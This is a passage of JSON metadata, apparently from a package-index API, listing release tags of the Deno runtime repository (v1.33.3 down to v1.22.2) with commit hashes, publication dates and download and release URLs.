12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_